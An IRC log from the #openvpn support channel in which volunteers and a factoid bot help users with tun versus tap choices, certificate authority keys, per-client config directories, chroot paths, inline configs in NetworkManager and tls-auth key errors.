[~dmonjo@178.135.18.38] has joined #openvpn 06:07 < dmonjo> hello 06:08 < dmonjo> what are the beneifts of doing bridging vpn vs the ip ? 06:08 < dmonjo> layer2 vs layer3 06:08 < dpecka> dazo: i don't understand than why how generated client key relates to ca.crt 06:08 < dpecka> **then 06:09 < pekster> dmonjo: 06:09 < pekster> !tunortap 06:09 <@vpnHelper> "tunortap" is (#1) you ONLY want tap if you need to pass layer2 traffic over the vpn (traffic destined for a MAC address). If you are using IP traffic you want tun. Dont waste the extra overhead. or (#2) and if your reason for wanting tap is windows shares, see !wins or (#3) also remember that if someone gets access to any side of a tap vpn they can use layer2 attacks like arp poisoning against you 06:09 <@vpnHelper> over the vpn or (#4) lan gaming? use tap! or (#5) Normal Android/iOS devices (not rooted/jailbroken) support only tun. 06:09 < dpecka> dazo: what it is good for .. if you have ca.crt you can use it for generating unlimited amount of client certs, right ? 06:10 < pekster> dmonjo: Generally speaking, you don't want to bridge unless you have an actual need to exchange Ethernet or multicast traffic. tun has less overhead, doesn't waste bandwidth with subnet broadcast traffic, and is slightly more secure against Layer 2 attacks performed by compromised VPN clients 06:10 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has joined #openvpn 06:11 < pekster> dpecka: ca.key does the signing; the .crt files are the public keys (the "public" in "Public Key Infrastructure") 06:12 < dmonjo> pekster: what i want to do is connect 2 connections from source to an openvpn server i want to take advantages of combining the throught of both connections (1mb conn1 + 2mb conn2) = 3mb uplink to outside server 06:12 < dmonjo> for that i think only tap works right 06:13 < pekster> That won't work the way you expect without cooperation from the other endpoint, and if you have that you might as well trunk over the native links and run openvpn on top of that if you need a security layer 06:15 < dmonjo> pekster: both endpoints are under my control 06:15 < dmonjo> what do you mean by cooperation 06:16 < pekster> If you're not familiar with trunking, it's not like normal routing since the peer needs to accept traffic from an address that's bound to the other line in a trunked configuration 06:16 < pekster> You can't just connect 2 uplinks and expect to add your throughput together like magic; that's not how it works 06:19 < pekster> This is a Linux-centric example, but here's a brief demonstration of what you'd need for that kind of a trunk over whatever random provider you have: http://lartc.org/howto/lartc.loadshare.html 06:19 <@vpnHelper> Title: Load sharing over multiple interfaces (at lartc.org) 06:19 < pekster> Specifically, note the caveats section where they explain that you won't actually get any practical performance benefit from this 06:20 < pekster> But it might depend on your traffic and usecase I guess 06:32 < havoc> interesting/relevant: http://therosiek.com/2011/03/nic-teaming-on-debian-squeeze/ 06:32 <@vpnHelper> Title: NIC Teaming on Debian Squeeze « TheRosiek.com (at therosiek.com) 06:36 < pekster> teaming works well where you have 2 identical pieces of hardware connected to a physical switch, but not so well when you have things like unmatched WAN links to 2 providers. I guess technically, yes, you can use tap and team across them with support of the remote endpoint you're connected to if it bridges them back. I'd wager that performance will be worse than if you used 1 ISP alone 06:36 <@plaisthos> should be okay if you usage standard teaming 06:36 <@plaisthos> which will use only one of the links per connection 06:38 -!- brute11k [~brute11k@89.249.235.210] has quit [Ping timeout: 244 seconds] 06:39 -!- brute11k [~brute11k@89.249.235.210] has joined #openvpn 06:45 < havoc> pekster: yeah 06:45 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has quit [Ping timeout: 248 seconds] 06:48 -!- WinstonSmith [~WinstonSm@unaffiliated/winstonsmith] has joined #openvpn 06:48 -!- neilhwatson [~neil@cl-274.chi-03.us.sixxs.net] has quit [Quit: Leaving.] 06:52 < havoc> pekster: I was looking at it for my SuperMicro servers, dual NICs 06:53 < havoc> pekster: particularly for a debian VM host 06:56 < dmonjo> pekster: i think if the 2 source links are going from the same ISP it would work just fine since the 2 links would be running with same latency more or less 06:57 < dmonjo> if we using different isps then latency would make the 2 links slower yes 07:01 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 07:02 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has quit [Ping timeout: 264 seconds] 07:04 <@ecrist> !learn obfsproxy as See also !obfs. The link to TrafficObfuscation also contains a setup example 07:04 <@vpnHelper> Joo got it. 07:04 -!- master_of_master [~master_of@p57B54352.dip.t-dialin.net] has quit [Ping timeout: 248 seconds] 07:04 < pekster> I think I already added that 07:04 < pekster> !obfsproxy 07:04 <@vpnHelper> "obfsproxy" is (#1) For a writeup on using obfsproxy with OpenVPN see https://syria.hacktivist.me/?p=148 or (#2) See also !obfs. The link to TrafficObfuscation also contains a setup example or (#3) See also !obfs. The link to TrafficObfuscation also contains a setup example 07:05 <@ecrist> yeah, you did 07:05 <@ecrist> sorry, was reading scroll-back 07:05 < pekster> np 07:05 < pekster> Better have the info twice than not at all :) 07:05 < pekster> !forget obfsproxy 3 07:05 <@vpnHelper> Joo got it. 07:05 < pekster> But once is better 07:06 -!- master_of_master [~master_of@87.181.77.103] has joined #openvpn 07:06 -!- krzee [nobody@openvpn/community/support/krzee] has quit [Read error: Connection reset by peer] 07:07 -!- KiNgMaR [~ingmar@2a00:1828:2000:289::cafe:d00d] has joined #openvpn 07:08 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 276 seconds] 07:09 <@ecrist> I should update the factiods page 07:10 <@ecrist> !factoids 07:10 <@vpnHelper> "factoids" is A semi-regularly updated dump of factoids database is available at http://www.secure-computing.net/factoids.php 07:12 -!- JSharpe [~JSharpe@188.227.181.234] has joined #openvpn 07:21 <@ecrist> there, now it'll update every 5 minutes automagically 07:21 < pekster> cron is a magical thing 07:22 <@plaisthos> invented by the ancient greeks! 07:22 <@plaisthos> (or so I heard) 07:22 <@ecrist> wowsers, we have a lot of factoids now 07:23 < pekster> One of my current */15 crons is waiting for the next rtorrent segfault so I can get a useful backtrace :) 07:23 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 260 seconds] 07:26 <@plaisthos> !-- is wrong btw. 07:26 <@plaisthos> !-- 07:26 <@vpnHelper> "--" is OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix must be removed when an option is placed in a configuration file. 07:27 <@plaisthos> !forget -- 07:27 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 07:27 < pekster> Right, config file will eat leading dashes IIRC 07:27 < pekster> The bot had some memory loss on access lists last night 07:27 <@plaisthos> :) 07:27 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has joined #openvpn 07:28 <@plaisthos> this prefix is usually omitted in a configuration file 07:28 <@plaisthos> -- works to btw :) 07:28 <@ecrist> !forget -- 07:28 <@vpnHelper> Joo got it. 07:30 <@plaisthos> !forget android-ipv6 07:30 <@vpnHelper> Error: You don't have the factoids.forget capability. If you think that you should have this capability, be sure that you are identified before trying again. The 'whoami' command can tell you if you're identified. 07:30 <@plaisthos> that is outdated 07:30 <@plaisthos> and forget !kindle 07:32 <@plaisthos> and !learn !kindle as OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 07:32 <@vpnHelper> Title: Index of /android (at plai.de) 07:35 < dmonjo> what are the advantages of openvpn over other vpn solutions 07:35 < dmonjo> other than being opensource 07:35 < dmonjo> feature wise 07:38 < pekster> Off the top of my head: ease of config, operates completely over a single UDP (or TCP) port making it NAT/firewall friendly are the big ones. It's also secure, unlike f.ex: pptp 07:38 < pekster> Well, "secure when used properly" like any proper security solution 07:39 < pekster> Very platform agnostic too, despite not being included "out of the box" 07:43 <@ecrist> let me fix your bot access, plaisthos, then you can do it 07:44 -!- pnielsen_ [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has joined #openvpn 07:44 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Remote host closed the connection] 07:45 -!- pnielsen [pnielsen@2a01:7e00::f03c:91ff:fedf:3a21] has quit [Ping timeout: 264 seconds] 07:45 -!- pnielsen_ is now known as pnielsen 07:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:51 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:51 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 07:52 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:52 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:52 <@ecrist> plaisthos: try now 07:52 <@ecrist> !whoami 07:52 <@vpnHelper> I don't recognize you. 07:53 <@ecrist> raar 07:53 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has quit [Client Quit] 07:54 -!- HyperGlide [~HyperGlid@li385-100.members.linode.com] has quit [Remote host closed the connection] 07:54 < dpecka> sorry boys but i don't understand clearly how it works 07:55 < dpecka> is easy-rsa/2.0/build-key chained somehow to existing ca.crt ? so when i build new client key with included . vars, is ca.crt used to create client key ? 07:55 < dpecka> can attacker get access to my vpn server if he gets ca.crt ? 07:55 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 260 seconds] 07:56 -!- vpnHelper [~vpnHelper@openvpn/bot/vpnHelper] has joined #openvpn 07:56 -!- mode/#openvpn [+o vpnHelper] by ChanServ 07:56 <@ecrist> dpecka: once your CA is built with easy-rsa, it uses that structure to build client certs 07:56 <@ecrist> ca.crt is safe to give out to anyone 07:56 <@ecrist> it's the ca.key you need to keep safe 07:56 <@ecrist> !whoami 07:56 <@vpnHelper> ecrist 07:57 <@ecrist> pekster: do you still have bot access? (just do !whoami) 07:58 -!- nickanderson_afk is now known as nickanderson 07:58 < dpecka> ecrist: ah, so nobody can generate key usable to establish connection without ca.key ? 07:59 < dpecka> ecrist: also i'd like to ask, if default setup as it is described in howto (with 1024b keys length) is strong enough 08:00 < pekster> !whoami 08:00 <@vpnHelper> support 08:00 < pekster> Based on the cloak now it appears 08:00 <@ecrist> dpecka: correct, you need both ca.crt and ca.key to generate new certificates, and you need the password for ca.key, as well 08:00 < dpecka> i mean: . vars; ./build-ca; build-key-server server; ./build-key client0 08:00 <@ecrist> pekster: perfect 08:00 <@ecrist> I *think* i have the bot access list resolved 08:00 < dpecka> ecrist: thanks much 08:01 <@ecrist> dpecka: 1024 is strong enough, but we recently changed the default to 2048 08:01 < dpecka> okay 08:01 <@ecrist> it's available in git, but we haven't released that yet 08:01 <@ecrist> (you can just change the openssl conf) 08:02 < dpecka> thanks guys .. everything works fine for me .. i just followed howto and made few more changes in regard to documentation 08:02 * pekster is burried in manpages now, forcing himself to learn how to prepare this patch the "right" way in git :) 08:02 -!- nickanderson [~cmdln@ginger.pilgrimpage.com] has left #openvpn [] 08:02 <@ecrist> pekster: git clone, make your changes, git commit, git diff 08:03 <@ecrist> you can do the pull request thing, too, but I don't know how to do that 08:03 <@plaisthos> !whoami 08:03 <@vpnHelper> developers 08:03 < pekster> Yea, I first was trying to see how to root to the 2.3.0 tag (or w/e the git version of a tag is) 08:03 <@plaisthos> !forget android-ipv6 08:03 <@vpnHelper> Joo got it. 08:03 <@plaisthos> !learn kindle as OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:03 <@vpnHelper> Joo got it. 08:03 < dpecka> ecrist: last Q:, can i somehow granuralily set up different settings per-client (like different routes, etc) or do I have to run another instance of openvpn ? 08:03 <@plaisthos> !-- 08:03 <@plaisthos> !kindle 08:03 <@vpnHelper> "kindle" is (#1) http://plai.de/android/ - Please report back if you have issues, or if it worked well. (blame plaisthos either way) or (#2) OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:04 <@plaisthos> !forget kindle 1 08:04 <@vpnHelper> Joo got it. 08:04 <@plaisthos> !kindle 08:04 <@vpnHelper> "kindle" is OpenVPN for Android works fine on Kindle Fire HD and Kindle Fire 2nd generation. Get the apk from http://plai.de/android 08:04 <@ecrist> dpecka: yes, using CCD 08:04 <@ecrist> !ccd 08:04 <@vpnHelper> "ccd" is (#1) entries that are basically included into server.conf, but only for the specified client based on common-name. use --client-config-dir to enable it, then put the config options for the client in /common-name or (#2) the ccd file is parsed each time the client connects. 08:04 <@plaisthos> !-- does not seem to work at all :) 08:04 < dpecka> great 08:04 < dpecka> fantastic 08:05 <@ecrist> plaisthos: I removed it above, for you 08:08 <@plaisthos> ah okay 08:08 -!- dmonjo_ [~dmonjo@178.135.250.76] has joined #openvpn 08:09 <@plaisthos> !learn -- as OpenVPN allows any option to be placed either on the command line or in a configuration file. Though all command line options are preceded by a double-leading-dash ("--"), this prefix is usually omitted when an option is placed in a configuration file. 08:09 <@vpnHelper> Joo got it. 08:10 -!- defswork [~andy@141.0.50.105] has joined #openvpn 08:10 -!- dmonjo [~dmonjo@178.135.18.38] has quit [Ping timeout: 276 seconds] 08:16 -!- defswork [~andy@141.0.50.105] has quit [Ping timeout: 256 seconds] 08:28 -!- defswork [~andy@141.0.50.105] has joined #openvpn 08:53 -!- speed_racer8 [~speed_rac@c-98-196-168-201.hsd1.tx.comcast.net] has quit [Ping timeout: 276 seconds] 08:58 -!- jthunder [~jthunder@174.3.126.51] has joined #openvpn 09:06 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 09:07 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 09:26 < dbhaber_> http://www.cnn.com/2013/02/20/us/california-hotel-water-corpse/index.html?hpt=hp_c1 09:26 <@vpnHelper> Title: Corpse found in L.A. hotel's water tank - CNN.com (at www.cnn.com) 09:26 < dbhaber_> win 09:29 -!- dmonjo__ [~dmonjo@178.135.211.106] has joined #openvpn 09:31 -!- dmonjo_ [~dmonjo@178.135.250.76] has quit [Ping timeout: 244 seconds] 09:40 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has joined #openvpn 09:43 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 09:48 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has quit [Quit: Leaving] 09:49 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has quit [Ping timeout: 264 seconds] 09:54 -!- jthunder [~jthunder@174.3.126.51] has quit [Quit: jthunder] 10:00 -!- zhvtar is now known as Zhvtar 10:02 -!- Valcorb [~Valcorb@d54C68BC0.access.telenet.be] has joined #openvpn 10:03 -!- speed_racer8 [~speed_rac@c-76-30-149-251.hsd1.tx.comcast.net] has joined #openvpn 10:05 -!- Zhvtar [~zhvtar@unaffiliated/zhvtar] has left #openvpn [] 10:10 -!- echinos_ is now known as echinos 10:12 -!- bandroidx [~bandroidx@2605:6400:2:fed5:4:0:414:11] has quit [Ping timeout: 245 seconds] 10:16 -!- raidz_away is now known as raidz 10:17 -!- nutcase [~nutcase@unaffiliated/nutcase] has quit [Ping timeout: 276 seconds] 10:20 -!- nutcase [~nutcase@unaffiliated/nutcase] has joined #openvpn 10:25 -!- jthunder [~jthunder@70.28.245.58] has joined #openvpn 10:38 -!- mattock [~mattock@openvpn/corp/admin/mattock] has left #openvpn [] 11:14 -!- dballester [~dballeste@139.49.17.109.rev.sfr.net] has quit [Quit: Saliendo] 11:21 -!- [1]JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has quit [Quit: HydraIRC -> http://www.hydrairc.com <- It'll be on slashdot one day...] 11:22 -!- JPeterson [~JPeterson@s213-103-210-215.cust.tele2.se] has joined #openvpn 11:24 -!- mattock_afk [~mattock@openvpn/corp/admin/mattock] has joined #openvpn 11:24 -!- mode/#openvpn [+o mattock_afk] by ChanServ 11:24 -!- mattock_afk is now known as mattock 11:24 -!- kyrix [~ashley@85-126-76-82.work.xdsl-line.inode.at] has quit [Ping timeout: 252 seconds] 11:25 -!- echinos [~echinos@67.196.136.211] has left #openvpn [] 11:30 -!- jthunder [~jthunder@70.28.245.58] has quit [Quit: jthunder] 11:41 -!- dmonjo__ [~dmonjo@178.135.211.106] has quit [Ping timeout: 255 seconds] 11:50 -!- GabrieleV [~GabrieleV@host190-79-static.230-95-b.business.telecomitalia.it] has quit [Ping timeout: 255 seconds] 11:59 -!- MeanderingCode [~Meanderin@71-213-185-188.albq.qwest.net] has joined #openvpn 12:08 -!- dazo is now known as dazo_afk 12:09 -!- krzee [nobody@openvpn/community/support/krzee] has joined #openvpn 12:09 -!- mode/#openvpn [+o krzee] by ChanServ 12:11 -!- mirco [~mirco@pd95b6029.dip0.t-ipconnect.de] has quit [Ping timeout: 255 seconds] 12:12 <@krzee> pekster, i saw some scroll about ethernet bonding over 2 links 12:12 <@krzee> i have seen someone do it, and actually increase their single-connection download speed 12:12 -!- folivora_ is now known as folivora 12:12 <@krzee> 2 tap links to the same server over different ISPs, then ethernet bonding them 12:13 <@krzee> however, he ended up getting buffer issues 12:13 < pekster> Right, but the link will be hyper-sensitive to re-ordering or delivery issues 12:13 < pekster> Yea 12:13 <@krzee> exactly 12:13 <@krzee> i was thinking qos could maybe help that 12:13 -!- baobeiiii [~baobeiiii@192.73.244.224] has joined #openvpn 12:13 <@krzee> but never saw him again to suggest it 12:13 < pekster> That reaks havoc with things like the tcp sliding window, and non-*nix doesn't deal well with the overall re-ordering 12:13 < dioz> pekster: about a week ago you were talking to me in #cisco about some stuff 12:14 < dioz> and i had mentioned that my residential gateway doesn't traverse protocol 41 12:14 < pekster> I've never been in #cisco 12:14 < pekster> I hang out in #ipv6 though 12:14 < dioz> maybe #ipv6 then 12:14 < dioz> yah 12:14 < pekster> sixxs.net has AICCU, a client that can speak AYIYA which has an IETF RFC to tunnel 6in4 traffic over UDP 12:15 < dioz> i wonder if sixxs.net has my isp e-mail blocked 12:15 < dioz> cause they won't respond to me 12:15 < pekster> Yea, lots of horror stories about sixx.net and email; you really ought to use an "established" email account; just forward a gmail or something to your personal mail 12:15 < dioz> like gmail 12:15 < dioz> okay thanks 12:16 < pekster> Although if it's with a major ISP that "should" please them. Then again, the guy who runs it is a jerk and uptight about some things, email in particular 12:16 -!- hg_5 [~chatzilla@unaffiliated/hg-5/x-8664886] has joined #openvpn 12:16 < pekster> Just be sure you list everything they want on the contact page, and try and be polite since he gets into a pissing match easy it seems 12:20 < dioz> pekster: 12:20 < dioz> hping3 -0 -t 1 -H 41 -T 12:20 < dioz> doing that to a host in a different AS 12:20 < dioz> it stops at my residential gateway 12:20 < dioz> that would imply to me that it is the gateway blocking the prot41 packets 12:20 < dioz> is that a safe assumption? 12:23 -!- odoacre_ [~antonio@us.happylatte.com] has joined #openvpn 12:24 < dbhaber_> wat 12:24 < dbhaber_> dazo_afk: hello over there 12:24 < dbhaber_> hi krzee 12:24 <@krzee> dougy? 12:25 < dbhaber_> hihi 12:26 -!- dbhaber_ is now known as DougEFresh 12:26 -!- AndrewX192 [~andrew@unaffiliated/andrewx192] has quit [Ping timeout: 246 seconds] 12:26 < DougEFresh> lolol 12:26 <@krzee> wassup man 12:26 < DougEFresh> same ol 12:26 < DougEFresh> how you doin player 12:26 <@krzee> very well 12:26 <@krzee> just released my first mobile unit, did my first interview 12:26 <@krzee> want the link to it? 12:27 < DougEFresh> first what? 12:27 -!- odoacre [~antonio@222.126.240.10] has quit [Ping timeout: 255 seconds] 12:27 <@krzee> http://www.kittyfeet.com/2013/02/14/jeff-from-liberty-private-network-talks-about-his-secure-bat-phones/ 12:27 <@vpnHelper> Title: » Jeff from Liberty Private Network Talks About His Secure Bat Phones. Anarchy Gumbo Podcast (at www.kittyfeet.com) 12:27 <@krzee> that ^ 12:27 < DougEFresh> interesting 12:29 -!- _mnathani_ [~mnathani@198-84-231-11.cpe.teksavvy.com] has joined #openvpn 12:32 -!- mnathani [~mnathani@198-84-231-11.cpe.teksavvy.com] has quit [Read error: Connection reset by peer] 12:34 < DougEFresh> krzee: what else is new 12:34 < DougEFresh> are you still sitting around a bunch of carribean hoez 12:34 <@krzee> just got back from usa 12:34 < DougEFresh> where ya go 12:34 <@krzee> not right now, but yes 12:34 <@krzee> vegas and cali 12:34 < DougEFresh> nice 12:37 -!- takamichi [~Takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 12:51 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 12:54 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has quit [Ping timeout: 244 seconds] 13:01 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has joined #openvpn 13:08 -!- mattock is now known as mattock_afk 13:15 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has quit [] 13:17 -!- takamich_ [~private@c101-159.i07-26.onvol.net] has joined #openvpn 13:18 -!- takamich_ [~private@c101-159.i07-26.onvol.net] has quit [Client Quit] 13:19 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has joined #openvpn 13:20 -!- takamich_ [~takamichi@c101-159.i07-26.onvol.net] has quit [Client Quit] 13:27 -!- s7r [~s7r@openvpn/user/s7r] has joined #openvpn 13:27 -!- mode/#openvpn [+v s7r] by ChanServ 13:33 -!- wachpwnski [~Adium@c-67-176-229-52.hsd1.in.comcast.net] has joined #openvpn 13:34 < wachpwnski> Hey guys, I have an open vpn config file but everything doesn't transfer over when I import it into gnome network manager 13:35 < wachpwnski> Apparently I actually need the key files from the config, because it wont parse them out. 13:37 <@krzee> i dont know much about the importer in nm, we generally say not to use it, however importing your already working config is 1 way i would say its fine to use 13:38 <@krzee> you could try in-line configs 13:38 <@krzee> !inline 13:38 <@vpnHelper> "inline" is (#1) Inline files (e.g. ... are supported since OpenVPN 2.1rc1 and documented in the OpenVPN 2.3 man page (https://community.openvpn.net/openvpn/wiki/Openvpn23ManPage under INLINE FILE SUPPORT) or (#2) https://community.openvpn.net/openvpn/wiki/IOSinline for a writeup that includes how to use inline certs 13:38 < pekster> Unless you mean you have an inline config and nm won't take it? I can't quite tell what your issue is (or, more accurately, nm's issue) 13:38 < pekster> Also, holy crap git is awesome 13:39 < pekster> I'm hacking on easy-rsa a bit, and just discovered how powerful 'git stash' is. svn has no analagous feature 13:40 <@krzee> i think he means he has files that arent being found by the importer 13:40 <@krzee> maybe it needs to be in the same dir as config, maybe it needs to be a full path, i dunno 13:41 <@krzee> those are 3 things ild try, and im very sure 1 of them would work 13:41 < wachpwnski> krzee: yah, it's an inline config. so can I just copy paste the cdata to a file then? 13:41 < wachpwnski> then import that into nm? 13:41 <@krzee> ahh good call pekster! 13:42 < wachpwnski> It takes most of it, just requres a CA and Keyfile 13:42 < wachpwnski> which is inline on the config 13:42 <@krzee> ahh ok ya just put that data into a file and use config options ca / key 13:43 <@krzee> backup your config first! 13:43 < pekster> (no brackets, and quote the path if you have spaces in it, for some odd reason) 13:44 < wachpwnski> anything right of # is a comment correct? 13:44 <@krzee> yes 13:44 <@krzee> !comment 13:44 <@vpnHelper> "comment" is you can use ; or # to make comments in the config file 13:45 -!- mndo [~mndo@bl17-91-212.dsl.telepac.pt] has quit [Quit: going home] 13:45 < baobeiiii> pekster, nice, removing the stupid email fields etc? 13:46 < pekster> Indeed 13:47 < pekster> And getting used to git while I'm at it. I don't really have a good handle on what I'm doing yet, but I feel wickedly powerful anytime I ask git to do something. It's fast, lightweight, and actually helps development verses gets in the way 13:47 * pekster has a new SCM toy to play with now 13:49 < baobeiiii> interesting, googled it 13:49 < baobeiiii> amazon has a free book for download called pro git 13:50 -!- feth [~feth@ile-flottante.tuttu.info] has joined #openvpn 13:50 < feth> Hi 13:50 < pekster> It's been out for a number of years, I just was stuck in my stuborn ways of svn until this week 13:53 < feth> I'm having trouble with the ccd-exclusive directive on debian: I configured the ccd to be /etc/openvpn/ccd, and put files named according to the cnames in it, with nobody:nogroup 13:53 < baobeiiii> what other if any changes are you planning on making to easy-rsa? 13:53 < baobeiiii> its good, it's the only tool i have the competence to use lol 13:53 <@krzee> feth what are the permissions on the ccd dir? 13:54 < feth> krzee: drwxr-xr-x 2 nobody nogroup 1024 21 févr. 20:54 /etc/openvpn/ccd/ 13:54 <@krzee> dont want +w, but thats not the problem 13:55 <@krzee> pastebin me ls -l /etc/openvpn/ccd/ 13:55 <@krzee> unless its like 3 lines or less 13:55 < feth> the error is TLS related? Thu Feb 21 19:39:36 2013 us=620715 83.167.32.54:1194 TLS Auth Error: --client-config-dir authentication failed for common name 'mglmac26.mgl7.fr' file='/etc/openvpn/ccd/mglmac26.mgl7.fr 13:55 < pekster> baobeiiii: Nothing is changing for now except development builds, and even that's not official until they get merged/accepted upstream. And nothing's getting harder to use (easier actually with less crap to fill out) 13:55 < feth> krzee: it's only 1 line: ifconfig-push 10.100.0.26 10.100.0.1 13:55 <@krzee> and pastebin the server config with no comments 13:56 <@krzee> feth, i said ls -l not cat 13:57 < feth> krzee: ups. 13:57 < feth> the server: http://pastebin.com/TVRASdE5 13:57 < feth> the ccd: -rw-r--r-- 1 nobody nogroup 37 21 févr. 20:28 mglmac26.mgl7.f 13:57 < feth> r 13:58 <@krzee> im betting its the chroot 13:58 <@krzee> mv ccd server/ 13:58 < feth> got it also! 13:58 <@krzee> and change ccd line to be /ccd 13:58 < feth> yup 13:58 < feth> thanks, I had it in front of me 13:59 <@krzee> np, you prolly wanna fix that for other files too 13:59 < feth> could'nt see it though 13:59 <@krzee> such as ipp if you really want that 13:59 <@krzee> !ipp 13:59 <@vpnHelper> "ipp" is (#1) the option --ifconfig-pool-persist ipp.txt does NOT create static ips or (#2) Note that the entries in this file are treated by OpenVPN as suggestions only, based on past associations between a common name and IP address. They do not guarantee that the given common name will always receive the given IP address. If you want guaranteed assignment, see !iporder and !static 13:59 < feth> krzee: tru 13:59 <@krzee> and logfiles 14:00 < wachpwnski> rats, i extracted all the keys and my vpn connection still fails 14:00 <@krzee> i believe --tls-server is already part of --server 14:00 <@krzee> you're using the default cipher so dont need to specify 14:00 < feth> surprisingly, the log works 14:01 <@krzee> not running scripts, prolly dont want script-security 14:01 < feth> true, also 14:01 <@krzee> never want verb 10 14:01 < feth> I wanted to push weird outes, but found out it was ccd that I needed 14:01 < feth> krzee: I was debugging :) 14:01 <@krzee> 3 is fine for every way, 5 for debug 14:01 <@krzee> s/way/day/ 14:02 < feth> ack 14:02 <@krzee> 10 is way too hardcore for me to look at ;] 14:02 < pekster> verb levels higher than 5 are only useful if you're debugging at the source-code level 14:02 < feth> I'm very happy that you're so helpful :) 14:02 < feth> it's rare ! 14:03 < feth> krzee: I don't look at logs, I gerp them :) 14:03 < feth> grep 14:04 < pekster> Unless you're specifically asked for higher verbosity, no one here really wants to see logs higher than 4 (or sometimes 5 to identify/rule-out firewall issues) 14:08 < wachpwnski> am I supposed to include the —— BEGIN part in the keyfiles? 14:08 < kisom> Anyone else getting lots of "Authenticate/Decrypt packet error: bad packet ID" since upgrading to 2.3.0? 14:11 < pekster> wachpwnski: Yes, that's a required part of the key file (and the ending lines.) Text before/after that point is ignored 14:12 -!- novaflash [~novaflash@vpnserver1.jellemaautomatisering.nl] has quit [Changing host] 14:12 -!- novaflash [~novaflash@openvpn/corp/support/novaflash] has joined #openvpn 14:12 -!- mode/#openvpn [+o novaflash] by ChanServ 14:13 < pekster> kisom: My offhand guess for that would be mis-matched comp-lzo settings. That setting must be identical between peers, including any parameter after the directive 14:14 < kisom> pekster: comp-lzo is exactly the same on both sides. This setup used to work perfectly until I upgraded to 2.3. Anyways, I'm gonna try and disable lzo alltogether and see if it works better. 14:16 -!- baobeiiii [~baobeiiii@192.73.244.224] has quit [Quit: Leaving] 14:16 -!- Cpt-Oblivious [~Cpt-Obliv@a202101.upc-a.chello.nl] has quit [Ping timeout: 255 seconds] 14:21 -!- Shway [~Shway@216.208.252.66] has joined #openvpn 14:21 < wachpwnski> check this out: Key file 'static.key' used in --tls-auth contains insufficient key material [keys found=1 required=2] -- try generating a new key file with 'openvpn --genkey --secret [file]', or use the existing key file in bidirectional mode by specifying --tls-auth without a key direction parameter 14:22 < pekster> Older versions used smaller key sizes, and depending on your crypto settings, you may need more bits, especially when used in 4 parts with a directional setup 14:23 < pekster> See --secret in the manpage for a more detailed description 14:24 < wachpwnski> Can I convert my current key? 14:24 < wachpwnski> the sucky part is openvpn —config client.ovpn works fine 14:24 < pekster> No. Either use single-directional keys, ore generate a new one 14:24 < wachpwnski> but nm is just being lame 14:25 < pekster> Are you not using a directional parameter on the client side? 14:25 -!- Cpt-Oblivious [Cpt-Oblivi@a202101.upc-a.chello.nl] has joined #openvpn 14:25 < pekster> Oh, same config, same host, nm verses console? Interesting. the secert.key file is 1024-bit size? not 2048? 14:25 < wachpwnski> Under tls auth, i set keyfile to the v1 openvpn key and set key direction to 1 just like in the config 14:26 -!- baobeiiii [~baobeiiii@180.155.14.35] has joined #openvpn 14:26 < wachpwnski> it's also saying in the logs: WARNING: file 'client.key' is group or others accessible 14:27 < pekster> So fix it... 14:27 < wachpwnski> should I set that to 400 or soemthing? 14:27 < pekster> Yup 14:27 < pekster> 600 is fine too 14:28 < pekster> It's non-fatal, but it's bad practice to have sensitive files open to other users 14:28 < pekster> You wouldn't leave your wallet out in the company kitchen, even if you mostly trust your co-workers 14:28 < wachpwnski> true 14:29 < wachpwnski> so when i change key direction parameter to none or 0 it times out 14:30 < pekster> That's expected behaviour. Manpage knows why under --tls-auth 14:30 < pekster> (which will redirect you to --secret, which I believe I've already mentioned) 14:31 < wachpwnski> looks like I'm stuck using the console for now 14:32 -!- gedO [~quassel@client-178-16-35-81.inturbo.lt] has joined #openvpn 14:32 < pekster> networkmanager simply has a crappy openvpn implementation. I'm sure they'd accept patches, but I haven't heard that many good stories from people trying to use it. I used it all of once years ago and swore it off thten 14:33 < wachpwnski> Any other options ? 14:33 < pekster> I put buttons to a shell script to start/stop the VPN in my menubar if I need a GUI launcher 14:33 < pekster> Then again, I tend to have at least 2 terms open each 